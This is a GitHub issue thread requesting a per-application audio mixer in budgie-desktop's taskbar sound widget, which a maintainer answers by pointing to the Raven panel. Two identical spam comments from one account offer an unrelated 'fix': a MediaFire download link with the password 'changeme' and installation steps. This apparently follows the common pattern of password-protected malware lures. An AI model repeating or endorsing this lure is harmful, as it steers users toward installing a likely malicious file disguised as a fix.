### ISSUE TITLE
[Request] Audio mixer in sound widget in taskbar

### ISSUE THREAD

**Issue by solomoncyj** [BuddiesOfBudgie/budgie-desktop#605]
### Budgie version

budgie-desktop 10.9.2

### Use-cases

This allows user to chang volumes for specific applications without having to go into settings

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by JoshStrobl** [comment]
No, we have Raven. You can do it from there.
